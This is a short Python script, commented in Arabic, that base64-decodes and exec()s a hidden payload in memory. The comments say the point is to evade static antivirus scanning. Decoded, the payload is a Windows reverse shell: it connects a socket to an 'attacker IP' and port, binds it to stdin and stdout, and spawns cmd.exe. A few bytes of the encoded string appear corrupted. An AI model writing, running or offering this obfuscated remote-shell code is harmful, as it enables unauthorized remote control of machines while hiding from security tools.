import base64
import sys

# النص المشفر بالأسفل هو الكود التفاعلي الأصلي الخاص بك بعد تعديله ليتوافق مع نظام ويندوز (cmd.exe)
# بمجرد تشغيل الملف، يتم فك التشفير وتنفيذه مباشرة في الذاكرة العشوائية (RAM) لتجاوز الفحص الثابت لبرامج الحماية
encoded_logic = b"aW1wb3J0IHNvY2tldAppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgb3MKaW1wb3J0IHN5cwoKZGVmIHN0YXJ0X3BheWxvYWQoKToKICAgIHRyeToKICAgICAgICBwcmludCgiWytdIFdlbGNvbWUgdG8gdGhlIEludGVyYWN0aXZlIFRlc3RpbmcgUGF5bG9hZCIpCiAgICAgICAgQVRUQUNLRVJfSVAgPSBpbnB1dCgiWz9dIEVudGVyIEF0dGFja2VyIElQIEFkZHJlc3M6ICIpLnN0cmlwKCkKICAgICAgICBQT1JUID0gaW50KGlucHV0KCJbP10gRW50ZXIgVGFyZ2V0IFBvcnQ6ICIpLnN0cmlwKCkpCiAgICAgICAgcHpzc2ggPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcHpzc2gY29ubmVjdCgoQVRUQUNLRVJfSVAsIFBPUlQpKQogICAgICAgIG9zLmR1cDIocHpzc2guZmlsZW5vKCksIDApCiAgICAgICAgb3MuRefpMihwenNzaC5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHB6c3NoLmZpbGVubygpLCAyKQogICAgICAgIHN1YnByb2Nlc3MuY2FsbChbImNtZC5leGUiXSkKICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICBwYXNzCgppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOgogICAgc3RhcnRfcGF5bG9hZCgp"

try:
    # تشغيل الكود ديناميكياً في الذاكرة
    exec(base64.b64decode(encoded_logic))
except KeyboardInterrupt:
    sys.exit(0)
except Exception:
    pass

